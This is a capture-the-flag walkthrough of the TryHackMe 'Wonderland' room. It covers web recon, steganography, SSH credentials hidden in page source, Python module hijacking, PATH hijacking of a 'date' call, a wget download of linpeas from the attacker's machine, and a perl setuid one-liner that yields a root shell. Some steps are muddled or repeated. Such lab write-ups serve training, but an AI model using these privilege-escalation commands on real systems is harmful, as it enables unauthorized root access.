December 28, 2020

TryHackMe.com Wonderland box

After deploying the server I navigated to the site and I came across this:

I then ran nmap to give me a list of ports open.  I noticed nothing out of the ordinary.  Ports 22 and 80 are open and 58068 is filtered so I didn't focus on that one.

Next step that I did was to run gobuster to see if there are any other directories directories on the server.

I saw there was an /img directory.  I started by going to that directory to see if there is anything in there.  I noticed that there were 3 hyper links to different images.  I downloaded the files to inspect them for anything hidden.

Just for fun I ran steghide on all three photos and the two with alice in the name returned nothing.  The white_rabbit_1.jpg said that there was a hint.txt file saved.  That is interesting and then I opened the file to look at the contents.

I used the cat command to get the contents of the hint.txt file and it contained the sentence "follow the r a b b i t".  That is interesting because if you look at the original gobuster output there was a /r path.

I then went to the /r directory and there was more of the poem.  I then went to the /a next and I noticed that it was working.  I then went all the way /r/a/b/b/i/t and I came upon this screen.

I didn't notice anything on the page that looked interesting so I decided to look at the code of the website to see if there are any comments or other interesting text.


There was an interesting hidden paragraph tag in the code and that turns out to be ssh credentials for the box.

Once I had the credentials I then logged on to the server using the credentials and started to look for the user flag.  When I did an ls on Alice's home directory I see that we have two files.

I can't view the root.txt because the file is owned by the root user but I can view the contents of walrus_and_the_carpenter.py.  It is the text of Alice in Wonderland except for a few lines at the bottom which just cut out 10 lines and print them to the screen, so that isn't very interesting.

I then checkout what commands Alice can run as a sudo user using sudo -l.

I ran the script with no interesting results so I checked to see if the script has an import statement and it imported random.  This is the command that is used to check for the contents of the file cat walrus_and_the_carpenter.py | grep -i import.  I then created a random.py file in the same directory as the walrus file.

I see that she can run python3 as rabbit so I try the following command.  sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py  After that I am greeted with a nice result.

I see that I am now rabbit and I want to see what is in the Rabbit's home directory.  I see that there is a binary file so I run it.

I want to pull the binary back to my machine so that I can check the output of the file with the "strings" command.  To do that I start an http server on the victim box by using python3 -m http.server.

I get the file onto my kali box and and I notice that there is a date function that is being called without reference a path.  I will do the same thing here that I did in the above steps and make my own date function that will get me one step further, hopefully.

After I got the file on my computer, I ran the cat command pipped into the strings command cat teaParty | string and I noticed in the output that it was using the date function without specifying a path.  I know that I can do something similar to the python script above and abuse that file.

We will have to change the PATH variable to point to Rabbit's home directory.  
export PATH=/home/rabbit:$PATH  
I will also create a script to start a bash script via the elevated user. Don't forget to make the file executable, chmod +x date.

Once you do that you should have elevated privileges on the machine.  The current user should be hatter.

Once you have the user hatter you can now go to the hatter's home directory (/home/hatter) and you will see a file called password.txt.  Use the cat command to get the contents of the file.  Time to find out what the password is for on the system.  I try to run sudo -l and when prompted for the password, I find out that this is the hatter's password.  Hatter has no privileges to run anything as a sudoer on the machine.

Now I would like to see if I can get linpeas on here and see if I can escalate from here.  After I did a cat on the passwd (cat /etc/passwd) file and I see that I have escalated to the highest user besides root I need to see if I can get to root.

I now have to get linpeas from my machine onto the target box. To do that I need to start an http server on my machine in the directory that has the linpeas.sh script and to do that you use python3 -m http.server.

On the victim computer you can run the command wget http://<IP ADDRESS>:8000/PATH/TO/FILE and then the script should be downloaded to your machine. After the script is on the machine I would transfer it to the /tmp directory so that it can be executed there.  To execute it you will have to chmod +x linpeas.sh and then to execute it ./linpeas.sh.  

Before I will execute the linpeas script I check the hatter's home directory (/home/hatter) and see what files may be there.  I see there is a password.txt file and it contains a password for hatter.  So, then we need to switch to hatter by using the command su hatter.  

I will also use tee to create a log file to sort through and pull back to my computer for reference later.

Once you are hatter you can run the linenum script and you will see that the perl binary has a suid set.  This can be exploited via the following command obtained from GTFO bins: perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

When you run that command you can use the command whoami and that should say that you are root.  From there you will just cat the root.txt file that is located in Alice's home folder.

Now onto finding the user.txt, I enter the command find / -name user.txt and find out it is in the /root folder.  Just cat the file like the other flag file and you will have the user flag.